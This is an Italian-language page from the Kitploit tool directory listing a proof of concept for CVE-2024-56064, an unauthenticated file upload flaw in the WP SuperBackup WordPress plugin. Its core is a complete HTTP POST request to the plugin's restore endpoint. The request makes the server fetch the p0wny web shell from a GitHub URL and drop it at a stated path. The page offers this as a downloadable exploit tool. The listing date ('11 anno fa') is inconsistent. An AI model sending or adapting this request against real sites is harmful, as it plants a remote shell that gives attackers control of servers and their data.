Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-56064 — WP SuperBackup <= 2.3.3 - Caricamento Arbitrario di File senza Autenticazione | Kitploit
Strumenti/GitHubGitHub/randomrobbiebf/cve-2024-56064
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubrandomrobbiebf/cve-2024-56064

CVE-2024-56064

WP SuperBackup <= 2.3.3 - Caricamento Arbitrario di File senza Autenticazione

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-56064

WP SuperBackup <= 2.3.3 - Caricamento Arbitrario di File Non Autenticato

Descrizione

Il plugin Super Backup & Clone - Migrate for WordPress per WordPress è vulnerabile al caricamento arbitrario di file a causa della mancata validazione del tipo di file in tutte le versioni fino alla 2.3.3 inclusa. Ciò consente ad attaccanti non autenticati di caricare file arbitrari sul server del sito interessato, rendendo potenzialmente possibile l'esecuzione remota di codice.

Dettagli

  • Tipo: plugin
  • Slug: indeed-wp-superbackup
  • Versione Affetta: 2.3.3
  • Punteggio CVSS: 9.8
  • Gravità CVSS: Critico
  • Vettore CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CVE: CVE-2024-56064
  • Stato: Privato

POC

La shell potrebbe impiegare un po' di tempo per apparire.... apparirà in /wp-content/uploads/isnapshots/shell.php

root@kitploit:~
POST /wp-admin/admin.php?page=ibk_admin&tab=restore HTTP/1.1
Host: kubernetes.docker.internal:8929
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal:8929/wp-admin/admin.php?page=ibk_admin&tab=restore
Content-Type: multipart/form-data; boundary=---------------------------24461452295617717774000608677
Content-Length: 688
Origin: http://kubernetes.docker.internal:8929
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Priority: u=0, i

-----------------------------24461452295617717774000608677
Content-Disposition: form-data; name="ibk_restore_migrate_action"

1
-----------------------------24461452295617717774000608677
Content-Disposition: form-data; name="restore_type"

restore_url
-----------------------------24461452295617717774000608677
Content-Disposition: form-data; name="restore_url"

https://raw.githubusercontent.com/flozz/p0wny-shell/refs/heads/master/shell.php

-----------------------------24461452295617717774000608677
Content-Disposition: form-data; name="upload_file"; filename=""
Content-Type: application/octet-stream


-----------------------------24461452295617717774000608677--

Scarica lo strumento